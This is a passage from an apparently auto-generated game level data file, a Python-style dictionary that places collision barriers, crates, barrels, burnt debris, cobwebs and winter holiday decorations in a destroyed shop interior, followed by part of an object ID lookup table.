VBase3(-82.167, 0.0, 0.0),'Pos': Point3(26.198, 25.577, 11.808),'Scale': VBase3(1.165, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185470337.59kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(67.113, 0.0, 0.0),'Pos': Point3(-16.69, 24.259, 11.447),'Scale': VBase3(1.911, 1.0, 1.636),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185470390.84kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-18.653, -17.679, 11.718),'Scale': VBase3(1.0, 4.253, 1.264),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}},'1185470441.36kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': VBase3(89.377, 0.0, 0.0),'Pos': Point3(-17.856, -29.514, 11.672),'Scale': VBase3(0.272, 1.0, 1.27),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185470544.76kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(106.717, -87.866, 0.001),'Pos': Point3(39.583, -24.317, 0.841),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/chair_shanty'}},'1185470574.67kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.883, 0.0, 0.0),'Pos': Point3(-13.604, -20.389, -0.412),'Scale': VBase3(1.471, 1.0, 1.773),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473733.65kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': VBase3(88.229, 0.0, 0.0),'Pos': Point3(-17.058, 13.357, 0.0),'Scale': VBase3(1.255, 1.255, 1.664),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473757.92kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(41.705, 0.0, 0.0),'Pos': Point3(-12.321, 18.847, -0.42),'Scale': VBase3(1.264, 1.0, 1.645),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473855.14kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(86.357, 0.0, 0.0),'Pos': Point3(3.829, 27.413, 0.0),'Scale': VBase3(0.95, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185473892.76kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': VBase3(-29.531, 0.0, 0.0),'Pos': Point3(-8.525, 23.001, 0.0),'Scale': VBase3(0.481, 1.0, 1.568),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185474062.46kmuller': {'Type': 'ChickenCage','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.063),'Pos': Point3(25.894, 29.446, 0.019),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/ChickenCage'}},'1185474078.9kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-51.021, 0.0, 0.0),'Pos': Point3(26.971, 25.969, -0.117),'Scale': VBase3(1.107, 1.107, 2.232),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1185474160.92kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(36.854, 22.002, -0.231),'Scale': VBase3(1.0, 1.0, 2.21),'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1257882161.54caoconno': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(90.0, 0.0, 0.0),'Pos': Point3(41.986, -7.423, 0.079),'Scale': VBase3(1.0, 1.0, 1.0)},'1257882301.33caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-43.932, 0.0, 0.0),'Pos': Point3(-6.994, 7.717, 3.48),'Scale': VBase3(1.517, 1.517, 1.517),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_hol_decoStocking03_winter09'}},'1257882430.02caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-43.932, 0.0, 0.0),'Pos': Point3(-7.031, -12.848, 3.48),'Scale': VBase3(1.517, 1.517, 1.517),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_hol_decoStocking03_winter09'}},'1257882492.33caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-8.027, -11.44, 3.571),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08'}},'1257882618.84caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(6.549, 5.998, 179.338),'Pos': Point3(4.826, 29.601, 4.248),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257882758.42caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-13.217, -0.531, -177.739),'Pos': Point3(-2.132, -1.495, -0.01),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_doll'}},'1257882773.01caoconno': {'Type': 'Holiday','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(37.684, 0.0, 0.0),'Pos': Point3(-7.333, -9.409, -0.034),'Scale': VBase3(0.664, 0.664, 0.664),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_hol_decoGift04_winter08'}},'1257882905.81caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(90.389, 2.323, 179.984),'Pos': Point3(-20.753, -11.718, 4.108),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257883001.32caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-174.593, 5.102, 177.677),'Pos': Point3(18.943, -29.771, 2.527),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257883095.16caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(6.549, 5.998, 179.338),'Pos': Point3(19.317, 29.434, 3.804),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_staff'}},'1257883215.54caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(32.075, -83.302, 2.871),'Pos': Point3(39.832, 0.97, -0.139),'Scale': VBase3(1.147, 1.147, 1.147),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff_skull'}},'1257883292.66caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-88.582, 0.0, 0.0),'Pos': Point3(42.143, -15.392, 6.297),'Scale': VBase3(1.147, 1.147, 1.147),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff_skull'}},'1276275771.91caoconno': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': VBase3(-151.048, 0.0, 0.0),'Pos': Point3(-18.821, 22.007, 12.068),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateC_destroyed'}},'1276275849.16caoconno': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(-0.1, 0.0, 0.0),'Pos': Point3(-16.716, 28.591, 12.069),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateB_destroyed'}},'1276275913.72caoconno': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(81.975, 0.0, 0.0),'Objects': {'1276277085.36caoconno': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateA_destroyed'}}},'Pos': Point3(3.904, 20.76, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_crateA_destroyed'}},'1276276656.64caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(-0.636, -14.082, 14.483),'Pos': Point3(9.507, 20.895, 0.075),'Scale': VBase3(0.614, 0.614, 0.614),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_barrelSideways_destroyed'}},'1276276761.84caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(10.313, 17.264, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_cnt_barrelC_destroyed'}},'1276276898.97caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(-46.638, 0.047, -90.045),'Pos': Point3(12.996, 17.769, 1.142),'Scale': VBase3(0.541, 0.541, 0.541),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_barrelB_destroyed'}},'1276277250.06caoconno': {'Type': 'Barrel','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 34.976),'Pos': Point3(-13.263, 21.657, 0.092),'Scale': VBase3(0.614, 0.614, 0.614),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cnt_barrelSideways_destroyed'}},'1276278278.09caoconno': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(68.731, 49.719, -77.878),'Pos': Point3(15.157, -30.467, 6.37),'Scale': VBase3(0.421, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_beam'}},'1276279077.38caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(35.612, -2.691, -0.522),'Pos': Point3(25.664, -25.666, 0.188),'Scale': VBase3(0.681, 0.681, 0.681),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardA'}},'1276279087.64caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(45.35, -10.992, 175.068),'Pos': Point3(31.359, 23.275, 12.482),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276279113.08caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(142.66, -3.12, -0.604),'Pos': Point3(-1.755, 17.757, 0.643),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_boardA'}},'1276279130.95caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-10.192, 18.147, 12.068),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoA'}},'1276280787.84caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-35.493, 3.257, 0.0),'Pos': Point3(-0.25, 16.77, 0.694),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276280881.31caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-6.923, 60.032, 37.792),'Pos': Point3(33.223, 24.238, 13.848),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276280903.86caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(123.673, 2.878, 3.885),'Pos': Point3(33.805, 22.317, 12.388),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardB'}},'1276281003.14caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(2.758, -18.885, 0.244),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoC'}},'1276281034.33caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-0.357, 17.611, -0.168),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoA'}},'1276281060.67caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-81.162, 0.0, 0.0),'Pos': Point3(6.482, 13.146, 0.09),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoC'}},'1276281452.61caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-176.25, -1.059, -1.85),'Pos': Point3(0.663, -20.778, 0.607),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_boardA'}},'1276281527.78caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(173.27, 0.0, 0.0),'Pos': Point3(31.054, 23.758, 12.067),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276281535.05caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-71.069, 0.0, 0.0),'Pos': Point3(-13.005, -21.346, 12.069),'Scale': VBase3(0.608, 0.608, 0.608),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276281562.19caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(25.652, 23.758, 12.067),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276281609.44caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-87.387, 0.0, 0.0),'Pos': Point3(18.435, -27.532, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276282879.52caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-17.579, 2.137, -1.829),'Pos': Point3(-5.306, 11.299, 12.314),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_shn_debris_boardA'}},'1276282964.03caoconno': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(8.295, -21.13, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_stuccoB'}},'1276290221.34caoconno': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-131.931, -74.018, 14.279),'Pos': Point3(5.841, 17.88, 1.403),'Scale': VBase3(0.483, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_beam'}},'1276290315.28caoconno': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(111.719, -62.98, -65.667),'Pos': Point3(12.258, -29.597, 3.448),'Scale': VBase3(0.705, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_spn_debris_beam'}},'1276290526.81caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-75.54, 0.0, 0.0),'Pos': Point3(41.04, 4.103, -0.466),'Scale': VBase3(0.801, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276290564.5caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(168.642, 0.0, 0.0),'Pos': Point3(27.489, -26.319, -0.466),'Scale': VBase3(0.483, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276290607.91caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-135.502, 0.0, 0.0),'Pos': Point3(23.385, -27.559, -0.466),'Scale': VBase3(0.483, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276291879.27caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-37.866, 0.0, 0.0),'Pos': Point3(-1.924, 17.812, 0.0),'Scale': VBase3(1.304, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276291898.09caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(16.724, 0.0, 0.0),'Pos': Point3(8.213, 15.448, 0.0),'Scale': VBase3(1.103, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276291923.52caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(116.877, 0.0, 0.0),'Pos': Point3(12.043, 20.051, 0.0),'Scale': VBase3(0.676, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276530477.89caoconno': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(102.934, 2.264, 179.48),'Pos': Point3(-7.693, -9.189, 3.549),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_doll'}},'1276531019.5caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.883, 0.0, 0.0),'Pos': Point3(13.601, -28.855, -0.466),'Scale': VBase3(1.822, 1.0, 2.003),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276531170.86caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-127.789, 0.0, 0.0),'Pos': Point3(31.18, -25.054, -0.466),'Scale': VBase3(0.974, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}},'1276531673.56caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-14.464, -2.762, -0.307),'Scale': VBase3(2.949, 4.247, 1.874),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}},'1276551367.75caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(30.263, 0.0, -37.656),'Pos': Point3(39.214, 23.501, 24.156),'RenderEffect': False,'Scale': VBase3(3.804, 3.804, 3.804),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_a'}},'1276551376.2caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(130.616, 0.0, 24.675),'Pos': Point3(1.258, -24.271, 7.365),'RenderEffect': False,'Scale': VBase3(2.406, 2.406, 2.406),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_b'}},'1276551501.94caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(39.427, 0.0, 0.0),'Pos': Point3(-15.556, -30.782, 24.004),'RenderEffect': False,'Scale': VBase3(3.56, 3.56, 3.56),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_a'}},'1276551670.0caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(7.859, 0.0, 0.0),'Pos': Point3(-20.16, 0.585, 11.673),'RenderEffect': False,'Scale': VBase3(1.787, 1.787, 1.787),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_b'}},'1276551731.52caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-138.437, 0.0, 0.0),'Pos': Point3(-19.939, -26.565, 11.794),'RenderEffect': False,'Scale': VBase3(3.215, 3.215, 3.215),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_b'}},'1276551807.03caoconno': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-30.774, 0.0, 0.0),'Pos': Point3(-20.858, 25.184, 11.747),'RenderEffect': False,'Scale': VBase3(2.761, 2.761, 2.761),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_web_a'}},'1276710561.61caoconno': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.012, 0.0, 0.0),'Pos': Point3(6.61, 23.113, 0.0),'Scale': VBase3(0.787, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}},'Visual': {'Model': 'models/buildings/pir_m_int_shn_store_destroyed'}}},'Node Links': [],'Layers': {},'ObjectIds': {'1156268617.43dzlu0s': '["Objects"]["1156268617.43dzlu0s"]','1167851208.51kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851208.51kmuller"]','1167851297.48kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851297.48kmuller"]','1167851350.63kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851350.63kmuller"]','1167851586.93kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851586.93kmuller"]','1167851649.96kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851649.96kmuller"]','1167851807.53kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851807.53kmuller"]','1167851894.7kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851894.7kmuller"]','1167851921.09kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167851921.09kmuller"]','1167852002.85kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167852002.85kmuller"]','1167852037.59kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167852037.59kmuller"]','1167853082.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853082.76kmuller"]','1167853258.42kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853258.42kmuller"]','1167853323.74kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853323.74kmuller"]','1167853393.98kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853393.98kmuller"]','1167853497.35kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853497.35kmuller"]','1167853515.07kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853515.07kmuller"]','1167854100.26kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167854100.26kmuller"]','1167867245.29kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167867245.29kmuller"]','1167867305.85kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167867305.85kmuller"]','1167867328.81kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167867328.81kmuller"]','1167954371.88kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954371.88kmuller"]','1167954448.33kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954448.33kmuller"]','1167954476.21kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954476.21kmuller"]','1167954660.96kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954660.96kmuller"]','1167954776.51kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954776.51kmuller"]','1167954805.24kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167954805.24kmuller"]','1167957475.65kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957475.65kmuller"]','1167957685.83kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957685.83kmuller"]','1167957751.15kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957751.15kmuller"]','1167957802.44kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957802.44kmuller"]','1167957927.05kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167957927.05kmuller"]','1167958029.74kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958029.74kmuller"]','1167958411.18kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958411.18kmuller"]','1167958482.3kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958482.3kmuller"]','1167958587.96kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958587.96kmuller"]','1167958623.43kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958623.43kmuller"]','1167958659.04kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958659.04kmuller"]','1167958695.37kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958695.37kmuller"]','1167958771.16kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958771.16kmuller"]','1167958796.77kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958796.77kmuller"]','1167958843.83kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958843.83kmuller"]','1167958939.32kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167958939.32kmuller"]','1167959032.44kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959032.44kmuller"]','1167959049.71kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959049.71kmuller"]','1167959560.85kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959560.85kmuller"]','1167959641.15kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167959641.15kmuller"]','1167971424.47kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971424.47kmuller"]','1167971619.35kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971619.35kmuller"]','1167971752.08kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971752.08kmuller"]','1167971774.92kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971774.92kmuller"]','1167971834.25kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167971834.25kmuller"]','1174700283.27dzlu': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1174700283.27dzlu"]','1174700441.91dzlu': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1174700441.91dzlu"]','1181175670.12kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181175670.12kmuller"]','1181175794.6kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181175794.6kmuller"]','1181175917.18kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1167853497.35kmuller"]["Objects"]["1181175917.18kmuller"]','1181175986.39kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181175986.39kmuller"]','1181176040.37kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181176040.37kmuller"]','1181244708.62kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1181244708.62kmuller"]','1185470127.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470127.76kmuller"]','1185470337.59kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470337.59kmuller"]','1185470390.84kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470390.84kmuller"]','1185470441.36kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470441.36kmuller"]','1185470544.76kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470544.76kmuller"]','1185470574.67kmuller': '["Objects"]["1156268617.43dzlu0s"]["Objects"]["1185470574.67kmuller"]','1185473733.65kmuller': 